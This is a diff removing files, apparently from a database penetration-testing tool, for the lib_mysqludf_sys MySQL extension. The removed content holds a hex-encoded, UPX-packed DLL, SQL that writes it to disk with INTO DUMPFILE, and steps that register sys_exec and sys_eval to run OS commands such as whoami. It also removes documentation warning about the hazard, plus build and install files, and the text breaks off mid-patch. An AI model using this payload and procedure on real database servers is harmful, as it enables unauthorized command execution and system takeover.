-UPDATE udftest SET data=CONCAT(data,0x000000000000000000000000800000e0555058310000000000100000007000000010000000040000000000000000000000000000400000e02e7273726300000000100000008000000006000000140000000000000000000000000000400000c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000332e303300555058210d090209285e83bd2629a7f017550000480c000000240000260000eb);
-UPDATE udftest SET data=CONCAT(data,0xffcbffff8b442408833800741956578b7c2414b90c00be000010e8f3a566a56edd92ff5fb0015ec332c0c3cc2f0c2ab907fbeddbcf26111c8bf8288b4c24182ca45fc7011e16f7cf0eac5e2ecc5f0175128b4004676430f76e750a2c04c6010155710a1db2d8f3113ca4723f8b484df7efbe021152ff15968083c40485c075084514c365dffeff8bc8568d71018a114184d275f98b54142bce890a4019bb6dba7f4c39026b74186d07b0df4b06688b419974158db6ae9d9d88f3fdc7b61100230c5d37f6df85048b108d44110250899859108d893c19a16b1990173c0611b05b4a68935fe70f464085ed767732740a890aff254aa0c31f6fdb42fb53568b745b1d78734602088b46f6eddb2fd18d5c39010a525157e8300c108b5617d6de65fb02c60407974e5104219d1c76fb36c95342d2c4185357220300ad6cae843f005f5e995bc34f9099c309830c20af0b03a8c35dc242dc0081ec10305bd7f85ba102200033c489842c0d8b0620dcdc373f8c2424538b9c241c07556a01db2038360214893d515397f0fcc7de6dd76863cc5033ff14948bd8538d4c24287063edae3251895c421688debe712b6c435355904c8d5001084084c9cb63bf5d2bc22e8d2c3b55563b848bf054dde6842f528d043eb48c24511334db70d8634f528bfd4d20c4b38b5ebf6d4678105d53189c803eb3c67436c6443b04fbee3eff0063eb038d);
-UPDATE udftest SET data=CONCAT(data,0x490068fc6c0d3f777b5f8901205e5bd8e633cc7e0375bceee17481c401c31418f4935f0f0fecad221bc602011e3b0d2275c60cfff602f3c3e90807318bff5668805fb778ffdd7e56c07c5959a3062358045485f67505dbb07be133c040748326004908ff270929098e36d6fde8c70424063b0b5923d2efddbffdff558bec51510a39450c750e39056b107e3cff7337deb51bb37d0cb50910488b096957897c6cdd770a23480f85d47d641718ec797677db6d5135202c893d50bb1e50eb184af0c1febba705f43bc7741768e803a8306a0057aedbdeb02ed63ae7eb07c72c013ca12feddeddf04c6a025e9d096a1f920aa6eb3caa10bcae7deffd04b4c7051f281aa0e027fdfbbeb3075cf120b004ac1b9a59893573a576e32b085939b2f26973dfeebdfb34393d155c741c68062809dc430dd8f65ae1ff751034252316fff1acb919be54ee01dc0801a1db76367b6378d665fc00dfdb0fd4ac3dc944fc83f80266d26dec1b1b595bffa0584b7031fb0e376daf45d70f8487c7195413a5bbb6401e8b141810897d563fb6f5edef043bc87251833f6cf36a74390774e92d3cdbdaff372620f8108907b9f8b8bd599b5615441b474df86bdf1adf900c394d1003d00874b4890902886db76d0c1a0860eba7f60c3d881163564d442e38200bdb5758064c32fc3f5079811d8e4390c9c2e96a1068cd7de37712d8d0d88bd2f28b5d08);
-UPDATE udftest SET data=CONCAT(data,0x1c548597ddede433c95cfc897d2008fc3bf15abfdb5a8c393a4417e4f906ea3bf07405db16defd83fe02752ea152dc3bc1749e565fd03b7066e1865ee4000393113bd983fbf1d2141680120ab22735bb61ebfe642464205750135e436cb60e002f52d2061137ecafd153f76a0375434f34871df66c032168742e2c257febe3ad81851b71ec3409aae050516468854be5ac1065e8f62fb65ddb70fad2feff001907032ae4a4ae3dee070b1dc396ec16ff3bf07885d3246a1b5419de5da07d54550c0d05f8595d38b4a1dc8a22e928035f2120e6e6e6cd43051c891518891d14893569b6efe610893d0c668c1838060d2c666996661d0805042558fbee96002d7ffc9c8f14309556ed9f3fdb240704288d4508348b85e0fca05d3b1b63aa7095011c1920c6d8d6b12413180958c0091cb32c9fbb6b608985d8320a04dc57e01bc3031834687edf8f7d9af1ec596af75010e00a20833dd83bac7d2000f923685b1b7c4f9fc0244928c9c380401ef292223b2e5f6a144a13001531e9b190aaf8a29cc6e107bf7359eb676a08a904598fedd61d921b27355934e0f5f31d6e85bf03e4507f4b7c8cad6d5f506efe1cdc142cd6e2c4582a5b09e01b14f46393e525db08dfdc6c0bfe73130ab9d94e1e43f7d81bc0fa36edde0359485d1656b807c8be0457e946c75f503bc6730f8b0753025083c7b3f21c567afe72f13025d0d0f68dd8);
-UPDATE udftest SET data=CONCAT(data,0x14cc632f08b84d5a287f57bac466b374045262413c03c18138501bfcfb974575ef33d2b90b011c48180f94b0c29a6209895d7f3fd748b65b81df31c80fb74114a20571063357c5c6d20de908180b76de7db5ffffdf8a0c3bf972098b580803d93bfb720a4283c0283bd672e86a1c0ed933d94e4f6afe9d17705c30d00635640cfc5083c3ad31ccec0823316033c56a7c86d277f064a31a892a46096877843e2c49f0d2094c7574559734cb645f2d1350198c083b41b8f05b2d24c1e81ff709e00183bbedd40a034f170059948be5ebd84e6a969701ca3da3c0fab216ec14972fbb3191b111bacc1e540540fcb8a491444ca312aa10dc9d5c87b1095f14c3a45cb4c7acfbef5400d75cb6d9968e6c038d2be0fafcc11a68cef13ca8fc8a039b0403710dc395707018679651481473e2e3ddcdd86903786851d70ab142efe19c56a30e68f885225b7cf892bf4ee640bb25eea0397866760d85c3255aa39f0a358e04eb60ca78116bed935d388b7598920bae0c32b640f007080c9dfed66e672710b4f4330c113bf77507be4fe0b768ef59eb0b85f30a95c1e0100bf0a1f4b147c200f7d607045e5f5bb43f1919191b5005585c60811d1919646ca4000004c84305038700feff50a1172f4e6f20617267756d656e7473ddffffdf096c6c6f77656420287564663a206c69625f6d7973716c0d5f3f32f7b773085f696e666f293918);
-UPDATE udftest SET data=CONCAT(data,0x20766572777fdbfe73696f6e20302e01331f45787065637447657861eddb6f6f076c79201a65207374723f672074791b806d6d6b7572617121722bb065013b7477911f3f1f30f7968672206e4148436f756cdbb6636f246e6f74c463611320186d27a204766e79af660048b5ffffe66e201712c0015253445360a91de01b43b243bdf182720ea1bdf958d103c502633a5c4476476e6efb6edb8a539674b0735c41646d0769bed6fe7f6b938e2e57324b335354454e5550444106336d7bfbf665736b16705c7368c9655c762675be23a1b9ff5f6370705f70726f6af83e6ccb3e65ff5c52656c65617365182e706462c97c2716c8351bc707d0674d259b0ff50707069d92c3bad303e727cc08e3e84ed8810fd81f0a6b037f56a82090209e2b1210008d4516c1beb119bf44ff003400301855ff01162100e9b03c53505c100103c0bf00c7456e7669726f6edbbb2fdb7f5661726961626c6541184743757272145072ecf640fe6f636573734964546805616413d61a001f5469636ba1150dbd01d0fe51756572795003c36d616ef6de5aac37160e184469735937ffcbdf7e4c6962726a7943616c6c73497344656275676765db63ae9572685c96556e684064626f6f6f3164457846707469a146696c4adb52b6c219b4125417c9da0640a0611e11b65bdbbe49906c0c6b409d6d7087656bcd35e747517f77555122b6bb65091b);
-UPDATE udftest SET data=CONCAT(data,0x5c537973186d0bafbbd0ee2b41737365094c69ddeef634405f686974396d5f2e5fdffedaf6616d73670878110b646a753a5f666469fbb0f6bb760d5f4370705863b9b65f63721b05ec076164035f686f6f6b4bb800b6f62f636a835f1c75017c01a55f1d735ec16dce0a1f0a6c2164ad58b0adf02a17096e75131346982c0f652f5f3dd65cdbda723456fe6d1c187b0af67db1b7035f706f52296e1064687b2f80ef756c5e6d75a61bdcd696252cb3066ed633b8ed19d82508661167efbd83db5a9ce4790835c7b73773ad32c06e4d0fd76f737bcd950d75667216232e00ffffff1f19274b254920211c2f63183427310c0917251217136517090705160cbffdffff1e080a0b160918181505061b050c10060717062105110f061421110b93efffdb082b2205070d111d0d18532d4838060007d9fead950848330a090b0c0510051616f76fff760e0b34150b18160d3d0542b605121e14066932c7dae67f110c0e1d4d0517230d0c24082400f0a2410be2ff042804f0280104e008041cca0fab7f43d64c010500ce2e8e4938e000642160f902210b01090e6612f6bdc972121710090b021ed27cb3c905070360045bf6deef32f61e40012a0207069fb9dc062703b7013c230f40e7a6cc6c4fb000500227ec40565dc0771cd9d0214207926e59002fac2e746c36d8e66578741a0c900eb74260ddd287602e72647661ab08fb6b);
-UPDATE udftest SET data=CONCAT(data,0x0e5bc20a1302402e2649d374dffe032730021c0bd6b84dc04f737235ebb0d10860df731e4f4dc920cdcd5e4f980150223e72fb4d421b242412a052445300000000000000000900ff0000000000000000807c2408010f85b901000060be007000108dbe00a0ffff5783cdffeb0d9090908a064688074701db75078b1e83eefc11db72edb80100000001db75078b1e83eefc11db11c001db73ef75098b1e83eefc11db73e431c983e803720dc1e0088a064683f0ff747489c501db75078b1e83eefc11db11c901db75078b1e83eefc11db11c975204101db75078b1e83eefc11db11c901db73ef75098b1e83eefc11db73e483c10281fd00f3ffff83d1018d142f83fdfc760f8a02428807474975f7e963ffffff908b0283c204890783c70483e90477f101cfe94cffffff5e89f7b92a0000008a07472ce83c0177f7803f0075f28b078a5f0466c1e808c1c01086c429f880ebe801f0890783c70588d8e2d98dbe005000008b0709c0743c8b5f048d8430b472000001f35083c708ff96f0720000958a074708c074dc89f95748f2ae55ff96f472000009c07407890383c304ebe16131c0c20c0083c7048d5efc31c08a074709c074223cef771101c38b0386c4c1c01086c401f08903ebe2240fc1e010668b0783c702ebe28baef87200008dbe00f0ffffbb0010000050546a045357ffd58d870f02000080207f8060287f585054);
-UPDATE udftest SET data=CONCAT(data,0x505357ffd558618d4424806a0039c475fa83ec80e9f998ffff00000048000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000300010c02200100100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000);
-UPDATE udftest SET data=CONCAT(data,0x0000000000000000040000000000010018000000180000800000000000000000040000000000010002000000300000800000000000000000040000000000010009040000480000005c80000056020000e404000000000000584000003c617373656d626c7920786d6c6e733d2275726e3a736368656d61732d6d6963726f736f66742d636f6d3a61736d2e763122206d616e696665737456657273696f6e3d22312e30223e0d0a20203c7472757374496e666f20786d6c6e733d2275726e3a736368656d61732d6d6963726f736f66742d636f6d3a61736d2e7633223e0d0a202020203c73656375726974793e0d0a2020202020203c72657175657374656450726976696c656765733e0d0a20202020202020203c726571756573746564457865637574696f6e4c6576656c206c6576656c3d226173496e766f6b6572222075694163636573733d2266616c7365223e3c2f726571756573746564457865637574696f6e4c6576656c3e0d0a2020202020203c2f72657175657374656450726976696c656765733e0d0a202020203c2f73656375726974793e0d0a20203c2f7472757374496e666f3e0d0a20203c646570656e64656e63793e0d0a202020203c646570656e64656e74417373656d626c793e0d0a2020202020203c617373656d626c794964656e7469747920747970653d2277696e333222206e616d653d224d);
-UPDATE udftest SET data=CONCAT(data,0x6963726f736f66742e564339302e435254222076657273696f6e3d22392e302e32313032322e38222070726f636573736f724172636869746563747572653d2278383622207075626c69634b6579546f6b656e3d2231666338623362396131653138653362223e3c2f617373656d626c794964656e746974793e0d0a202020203c2f646570656e64656e74417373656d626c793e0d0a20203c2f646570656e64656e63793e0d0a3c2f617373656d626c793e504100000000000000000000000010830000f08200000000000000000000000000001d83000008830000000000000000000000000000000000000000000028830000368300004683000056830000648300000000000072830000000000004b45524e454c33322e444c4c004d5356435239302e646c6c00004c6f61644c69627261727941000047657450726f634164647265737300005669727475616c50726f7465637400005669727475616c416c6c6f6300005669727475616c46726565000000667265650000000000000000ca2e8e49000000003a840000010000000f0000000f000000a4830000e08300001c840000301000004012000000100000501200004012000010120000f01100004012000010120000a010000040120000601000009011000070110000e01000004f84000065840000828400009d840000a6840000b6840000c4840000cd840000);
-UPDATE udftest SET data=CONCAT(data,0xdd840000eb840000f3840000028500000f850000178500002685000000000100020003000400050006000700080009000a000b000c000d000e006c69625f6d7973716c7564665f7379732e646c6c006c69625f6d7973716c7564665f7379735f696e666f006c69625f6d7973716c7564665f7379735f696e666f5f6465696e6974006c69625f6d7973716c7564665f7379735f696e666f5f696e6974007379735f6576616c007379735f6576616c5f6465696e6974007379735f6576616c5f696e6974007379735f65786563007379735f657865635f6465696e6974007379735f657865635f696e6974007379735f676574007379735f6765745f6465696e6974007379735f6765745f696e6974007379735f736574007379735f7365745f6465696e6974007379735f7365745f696e6974000000700000100000005d3c583e5c3e00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000);
-
-
--- Export the hexadecimal encoded UDF to a binary file on the file system
--- 
--- On MySQL 5.1 >= 5.1.19 and on any version of MySQL 6.0:
--- 
--- From MySQL 5.1 and 6.0 official documentation:
--- 
---      shared_library_name is the basename of the shared object file
---      that contains the code that implements the function. The file 
---      must be located in the plugin directory. This directory is given
---      by the value of the plugin_dir system variable.
--- 
--- The DLL must be in can be in C:\Program Files\MySQL\MySQL Server M.m\lib\plugin
--- 
--- Note that C:\Program Files\MySQL\MySQL Server M.m\lib\plugin DOES NOT
--- exist by default so it is NOT possible to save the DLL in the proper
--- folder where MySQL server looks for DLLs.
--- 
--- References:
--- http://dev.mysql.com/doc/refman/5.1/en/create-function-udf.html
--- http://dev.mysql.com/doc/refman/6.0/en/create-function-udf.html
--- 
--- The DLL can be only in C:\Program Files\MySQL\MySQL Server M.n\lib\plugin
--- SELECT data FROM udftest INTO DUMPFILE 'C:/Program Files/MySQL/MySQL Server 5.1/lib/plugin/lib_mysqludf_sys.dll'; -- On MySQL 5.1 >= 5.1.19
--- SELECT data FROM udftest INTO DUMPFILE 'C:/Program Files/MySQL/MySQL Server 6.0/lib/plugin/lib_mysqludf_sys.dll'; -- On MySQL 6.0
--- 
--- On MySQL 4.1 < 4.1.25, MySQL 5.0 < 5.0.67 and MySQL 5.1 < 5.1.19:
--- 
--- From MySQL 4.1 and 5.0 official documentation:
--- 
---      shared_library_name is the basename of the shared object file
---      that contains the code that implements the function. As of MySQL
---      M.m.m, the file must be located in the plugin directory. This
---      directory is given by the value of the plugin_dir system variable.
---      If the value of plugin_dir is empty, the behavior that is used
---      before M.m.m applies: The file must be located in a directory
---      that is searched by your system's dynamic linker.
--- 
--- References:
--- http://dev.mysql.com/doc/refman/4.1/en/create-function-udf.html
--- http://dev.mysql.com/doc/refman/5.0/en/create-function-udf.html
--- 
--- The DLL can be in either C:\WINDOWS, C:\WINDOWS\system,
--- C:\WINDOWS\system32, @@basedir\bin or @@datadir (tested on MySQL 4.1.22
--- and MySQL 5.0.67 with NO plugin_dir set in my.ini configuration file,
--- which is the default setting)
--- SELECT data FROM udftest INTO DUMPFILE 'C:/Program Files/MySQL/MySQL Server 4.1/data/lib_mysqludf_sys.dll'; -- On MySQL 4.1 < 4.1.25 and on MySQL 4.1 >= 4.1.25 with NO plugin_dir set in my.ini configuration file
--- SELECT data FROM udftest INTO DUMPFILE 'C:/Program Files/MySQL/MySQL Server 5.0/data/lib_mysqludf_sys.dll'; -- On MySQL 5.0 < 5.0.67 and on MySQL 5.0 >= 5.0.67 with NO plugin_dir set in my.ini configuration file
--- SELECT data FROM udftest INTO DUMPFILE 'C:/Program Files/MySQL/MySQL Server 5.1/data/lib_mysqludf_sys.dll'; -- On MySQL 5.1 < 5.1.19 with NO plugin_dir set in my.ini configuration file
--- 
--- Notes:
--- If the library file already exists, the user SYSTEM does not have access
--- to overwrite it
--- The following enumerates the MySQL data directory
--- SELECT @@datadir
--- The followings will save into @@datadir. It is a valid PATH where MySQL
--- looks for DLL
-SELECT data FROM udftest INTO DUMPFILE './lib_mysqludf_sys.dll';
--- The followings will save into @@datadir\mysql where 'mysql' is the
--- database name where it is connected. It is not a valid PATH where MySQL
--- looks for DLL
--- SELECT data FROM udftest INTO DUMPFILE 'lib_mysqludf_sys.dll';
--- SELECT data FROM udftest INTO DUMPFILE '\lib_mysqludf_sys.dll';
--- The following will save into C:\. It is not a valid PATH where MySQL
--- looks for DLL
--- SELECT data FROM udftest INTO DUMPFILE '/lib_mysqludf_sys.dll';
-
-
--- Create two functions from the binary UDF file
--- DROP FUNCTION sys_exec; -- without 'IF EXISTS ' on MySQL < 5.0
--- DROP FUNCTION sys_eval; -- without 'IF EXISTS ' on MySQL < 5.0
-DROP FUNCTION IF EXISTS sys_exec; -- On MySQL >= 5.0
-DROP FUNCTION IF EXISTS sys_eval; -- On MySQL >= 5.0
-CREATE FUNCTION sys_exec RETURNS int SONAME 'lib_mysqludf_sys.dll';
-CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys.dll';
-
-
--- Test the two functions
-SELECT sys_exec('echo test > %TEMP%/lib_mysqludf_sys.txt'); -- %TEMP% path is C:\WINDOWS\Temp
-SELECT sys_eval('echo %TEMP% && whoami');
-
-
--- Cleanup the file system and the database
-SELECT sys_exec('del %TEMP%/lib_mysqludf_sys.*');
-DROP TABLE IF EXISTS udftest;
--- DROP FUNCTION sys_exec; -- without 'IF EXISTS ' on MySQL < 5.0
--- DROP FUNCTION sys_eval; -- without 'IF EXISTS ' on MySQL < 5.0
-DROP FUNCTION IF EXISTS sys_exec; -- On MySQL >= 5.0
-DROP FUNCTION IF EXISTS sys_eval; -- On MySQL >= 5.0

extra/mysqludfsys/lib_mysqludf_sys/doc/lib_mysqludf_sys.html

@@ -1,278 +0,0 @@
-<?xml version="1.0" encoding="UTF-8" ?>
-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
-<html xmlns="http://www.w3.org/1999/xhtml">
-<head>
-<link rel="stylesheet" type="text/css" href="../mysqludf.css"/>
-<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
-<title>lib_mysqludf_sys - A library of MySQL UDFs for working with the environment in which MySQL runs</title>
-</head>
-<body>
-	<div>
-		<a href="../index.html">Top</a>
-	|	<a href="../mysql_udf_repository_libraries.html">Up</a>
-	</div>
-	<h1>lib_mysqludf_sys</h1>
-	<div>
-		<a href="lib_mysqludf_sys.html">Documentation</a>
-	|	<a href="lib_mysqludf_sys.so">Binary</a>
-	|	<a href="lib_mysqludf_sys.sql">Installation</a>
-	|	<a href="lib_mysqludf_sys.c">Source</a>
-	|	<a href="lib_mysqludf_sys_0.0.2.tar.gz">tar.gz</a>
-	</div>
-	<p>
-		This library <code>lib_mysqludf_sys</code> contains a number of functions that allows one to interact with the operating system.		
-	</p>
-	<ol>
-		<li><a href="#sys_eval"><code>sys_eval</code></a> - executes an arbitrary command, and returns it's output.</li>
-		<li><a href="#sys_exec"><code>sys_exec</code></a> - executes an arbitrary command, and returns it's exit code.</li>
-		<li><a href="#sys_get"><code>sys_get</code></a> - gets the value of an environment variable.</li>
-		<li><a href="#sys_set"><code>sys_set</code></a> - create an environment variable, or update the value of an existing environment variable.</li>
-	</ol>
-	<p>
-		Use <a href="#lib_mysqludf_sys_info"><code>lib_mysqludf_sys_info()</code></a> to obtain information about the currently installed version of <code>lib_mysqludf_sys</code>.
-	</p>
-	
-
-	<a name="sys_eval"></a><h2>sys_eval</h2>
-	<p>
-		<code>sys_eval</code> takes one command string argument and executes it, returning its output.
-	</p>
-	<h3>Syntax</h3>
-<pre>sys_eval(<b>arg1</b>)</pre>
-	<h3>Parameters and Return Values</h3>
-	<dl>
-		<dt><code><b>arg1</b></code></dt>
-		<dd>
-			A command string valid for the current operating system or execution environment.
-		</dd>
-		<dt>returns</dt>
-		<dd>
-			Whatever output the command pushed to the standard output stream.
-		</dd>
-	</dl>
-	<h3>Installation</h3>
-	<p>
-		Place the shared library binary in an appropriate location. 
-		Log in to mysql as root or as another user with sufficient privileges, and select any database.		
-		Then, create the function using the following DDL statement:
-	</p>
-	<pre>
-CREATE FUNCTION sys_eval RETURNS STRING SONAME 'lib_mysqludf_sys.so';	
-	</pre>
-	<p>
-		The function will be globally available in all databases.
-	</p>
-	<p>
-		The deinstall the function, run the following statement:
-	</p>
-	<pre>
-DROP FUNCTION sys_eval;
-	</pre>
-	<h3>Examples</h3>
-	<p>
-		None yet
-	</p>
-	<h3>A Note of Caution</h3>
-	<p>
-		Be very careful in deciding whether you need this function. 
-		UDFs are available to all database users - you cannot grant EXECUTE privileges for them.
-		As the commandstring passed to <code>sys_exec</code> can do pretty much everything, 
-		exposing the function poses a very real security hazard.
-	</p>
-	<p>
-		Even for a benign user, it is possible to accidentally do a lot of damage with it.
-		The call will be executed with the privileges of the os user that runs MySQL, 
-		so it is entirely feasible to delete MySQL's data directory, or worse.		
-	</p>
-	<p>	
-		The function is intended for specialized MySQL applications where one needs extended 
-		control over the operating system. 
-		Currently, we do not have UDF's for ftp, email and http, 
-		and this function can be used to implement such functionality in case it is really necessary
-		(datawarehouse staging areas could be a case in example).
-	</p>
-	<p>
-		You have been warned! If you don't see the hazard, please don't try to find it; just trust me on this.
-	</p>
-	<p>
-                If you do decide to use this library in a production environment, make sure that only specific commands can be run and file access is limited by using <a href="http://www.novell.com/documentation/apparmor/index.html">AppArmor</a>.
-	</p>
-
-	<a name="sys_exec"></a><h2>sys_exec</h2>
-	<p>
-		<code>sys_exec</code> takes one command string argument and executes it.
-	</p>
-	<h3>Syntax</h3>
-<pre>sys_exec(<b>arg1</b>)</pre>
-	<h3>Parameters and Return Values</h3>
-	<dl>
-		<dt><code><b>arg1</b></code></dt>
-		<dd>
-			A command string valid for the current operating system or execution environment.
-		</dd>
-		<dt>returns</dt>
-		<dd>
-			An (integer) exit code returned by the executed process.
-		</dd>
-	</dl>
-	<h3>Installation</h3>
-	<p>
-		Place the shared library binary in an appropriate location. 
-		Log in to mysql as root or as another user with sufficient privileges, and select any database.		
-		Then, create the function using the following DDL statement:
-	</p>
-	<pre>
-CREATE FUNCTION sys_exec RETURNS INT SONAME 'lib_mysqludf_sys.so';	
-	</pre>
-	<p>
-		The function will be globally available in all databases.
-	</p>
-	<p>
-		The deinstall the function, run the following statement:
-	</p>
-	<pre>
-DROP FUNCTION sys_exec;
-	</pre>
-	<h3>Examples</h3>
-	<p>
-		None yet
-	</p>
-	<h3>A Note of Caution</h3>
-	<p>
-		Be very careful in deciding whether you need this function. 
-		UDFs are available to all database users - you cannot grant EXECUTE privileges for them.
-		As the commandstring passed to <code>sys_exec</code> can do pretty much everything, 
-		exposing the function poses a very real security hazard.
-	</p>
-	<p>
-		Even for a benign user, it is possible to accidentally do a lot of damage with it.
-		The call will be executed with the privileges of the os user that runs MySQL, 
-		so it is entirely feasible to delete MySQL's data directory, or worse.		
-	</p>
-	<p>	
-		The function is intended for specialized MySQL applications where one needs extended 
-		control over the operating system. 
-		Currently, we do not have UDF's for ftp, email and http, 
-		and this function can be used to implement such functionality in case it is really necessary
-		(datawarehouse staging areas could be a case in example).
-	</p>
-	<p>
-		You have been warned! If you don't see the hazard, please don't try to find it; just trust me on this.
-	</p>
-	<p>
-                If you do decide to use this library in a production environment, make sure that only specific commands can be run and file access is limited by using <a href="http://www.novell.com/documentation/apparmor/index.html">AppArmor</a>.
-	</p>
-	<a name="sys_get"></a><h2>sys_get</h2>
-	<p>
-		<code>sys_get</code> takes the name of an environment variable and returns the value of the variable.
-	</p>
-	<h3>Syntax</h3>
-<pre>sys_get([<b>arg1</b>)</pre>
-	<h3>Parameters and Return Values</h3>
-	<dl>
-		<dt><code><b>arg1</b></code></dt>
-		<dd>
-			A string that denotes the name of an environment value.			
-		</dd>
-		<dt>returns</dt>
-		<dd>
-			If the variable exists, a string containing the value of the environment variable.
-			If the variable does not exist, the function return NULL.
-		</dd>
-	</dl>
-	<h3>Installation</h3>
-	<p>
-		Place the shared library binary in an appropriate location. 
-		Log in to mysql as root or as another user with sufficient privileges, and select any database.		
-		Then, create the function using the following DDL statement:
-	</p>
-	<pre>
-CREATE FUNCTION sys_get RETURNS STRING SONAME 'lib_mysqludf_sys.so';	
-	</pre>
-	<p>
-		The function will be globally available in all databases.
-	</p>
-	<p>
-		The deinstall the function, run the following statement:
-	</p>
-	<pre>
-DROP FUNCTION sys_get;
-	</pre>
-	<h3>Examples</h3>
-	<p>
-		None yet
-	</p>
-	<h3>A Note of Caution</h3>
-	<p>
-		Be very careful in deciding whether you need this function. 
-		UDFs are available to all database users - you cannot grant EXECUTE privileges for them.
-		The variables known in the environment where mysql runs are freely accessible using this function.
-		Any user can get access to potentially secret information, such as
-		the user that is running mysqld, the path of the user's home directory etc.
-	</p>
-	<p>	
-		The function is intended for specialized MySQL applications where one needs extended 
-		control over the operating system. 
-	</p>
-	<p>
-		You have been warned! If you don't see the hazard, please don't try to find it; just trust me on this.
-	</p>
-	<a name="sys_set"></a><h2>sys_set</h2>
-	<p>
-		<code>sys_get</code> takes the name of an environment variable and returns the value of the variable.
-	</p>
-	<h3>Syntax</h3>
-<pre>sys_set([<b>arg1, arg2</b>)</pre>
-	<h3>Parameters and Return Values</h3>
-	<dl>
-		<dt><code><b>arg1</b></code></dt>
-		<dd>
-			A string that denotes the name of an environment value.			
-		</dd>
-		<dt><code><b>arg2</b></code></dt>
-		<dd>
-			An expression that contains the value that is to be assigned to the environment variable.			
-		</dd>
-		<dt>returns</dt>
-		<dd>
-			0 if the assignment or creation succeed.
-			non-zero otherwise.
-		</dd>
-	</dl>
-	<h3>Installation</h3>
-	<p>
-		Place the shared library binary in an appropriate location. 
-		Log in to mysql as root or as another user with sufficient privileges, and select any database.		
-		Then, create the function using the following DDL statement:
-	</p>
-	<pre>
-CREATE FUNCTION sys_set RETURNS STRING SONAME 'lib_mysqludf_sys.so';	
-	</pre>
-	<p>
-		The function will be globally available in all databases.
-	</p>
-	<p>
-		The deinstall the function, run the following statement:
-	</p>
-	<pre>
-DROP FUNCTION sys_set;
-	</pre>
-	<h3>Examples</h3>
-	<p>
-		None yet
-	</p>
-	<h3>A Note of Caution</h3>
-	<p>
-		Be very careful in deciding whether you need this function. 
-		UDFs are available to all database users - you cannot grant EXECUTE privileges for them.
-		This function will overwrite existing environment variables.
-	</p>
-	<p>	
-		The function is intended for specialized MySQL applications where one needs extended 
-		control over the operating system. 
-	</p>
-	<p>
-		You have been warned! If you don't see the hazard, please don't try to find it; just trust me on this.
-	</p>
-</body>
-</html

extra/mysqludfsys/lib_mysqludf_sys/linux/Makefile

@@ -1,6 +0,0 @@
-LIBDIR=/usr/lib
-
-install:
-	gcc -Wall -I/usr/include/mysql -O1 -shared src/lib_mysqludf_sys.c -o so/lib_mysqludf_sys.so
-	strip -sx so/lib_mysqludf_sys.so
-	sudo cp -f so/lib_mysqludf_sys.so $(LIBDIR)/lib_mysqludf_sys.so

extra/mysqludfsys/lib_mysqludf_sys/windows/lib_mysqludf_sys.sql

@@ -1,35 +0,0 @@
-/*
-        lib_mysqludf_sys - a library with miscellaneous (operating) system level functions
-        Copyright (C) 2007  Roland Bouman
-        Copyright (C) 2008-2009  Roland Bouman and Bernardo Damele A. G.
-        web: http://www.mysqludf.org/
-        email: roland.bouman@gmail.com, bernardo.damele@gmail.com
-
-        This library is free software; you can redistribute it and/or
-        modify it under the terms of the GNU Lesser General Public
-        License as published by the Free Software Foundation; either
-        version 2.1 of the License, or (at your option) any later version.
-
-        This library is distributed in the hope that it will be useful,
-        but WITHOUT ANY WARRANTY; without even the implied warranty of
-        MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
-        Lesser General Public License for more details.
-
-        You should have received a copy of the GNU Lesser General Public
-        License along with this library; if not, write to the Free Software
-        Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
-*/
-
-DROP FUNCTION IF EXISTS lib_mysqludf_sys_info;
-DROP FUNCTION IF EXISTS sys_get;
-DROP FUNCTION IF EXISTS sys_set;
-DROP FUNCTION IF EXISTS sys_exec;
-DROP FUNCTION IF EXISTS sys_eval;
-DROP FUNCTION IF EXISTS sys_bineval;
-
-CREATE FUNCTION lib_mysqludf_sys_info RETURNS string SONAME 'lib_mysqludf_sys.dll';
-CREATE FUNCTION sys_get RETURNS string SONAME 'lib_mysqludf_sys.dll';
-CREATE FUNCTION sys_set RETURNS int SONAME 'lib_mysqludf_sys.dll';
-CREATE FUNCTION sys_exec RETURNS int SONAME 'lib_mysqludf_sys.dll';
-CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys.dll';
-CREATE FUNCTION sys_bineval RETURNS int SONAME 'lib_mysqludf_sys.dll';

extra/mysqludfsys/lib_mysqludf_sys_0.0.3.patch

@@ -1,354 +0,0 @@
-diff -uN lib_mysqludf_sys_0.0.2/install.sh lib_mysqludf_sys/install.sh
---- lib_mysqludf_sys_0.0.2/install.sh	1970-01-01 01:00:00.000000000 +0100
-+++ lib_mysqludf_sys/install.sh	2009-01-21 00:51:52.000000000 +0000
-@@ -0,0 +1,43 @@
-+#!/bin/bash
-+# lib_mysqludf_sys - a library with miscellaneous (operating) system level functions
-+# Copyright (C) 2007  Roland Bouman 
-+# Copyright (C) 2008-2009  Roland Bouman and Bernardo Damele A. G.
-+# web: http://www.mysqludf.org/
-+# email: mysqludfs@gmail.com, bernardo.damele@gmail.com
-+# 
-+# This library is free software; you can redistribute it and/or
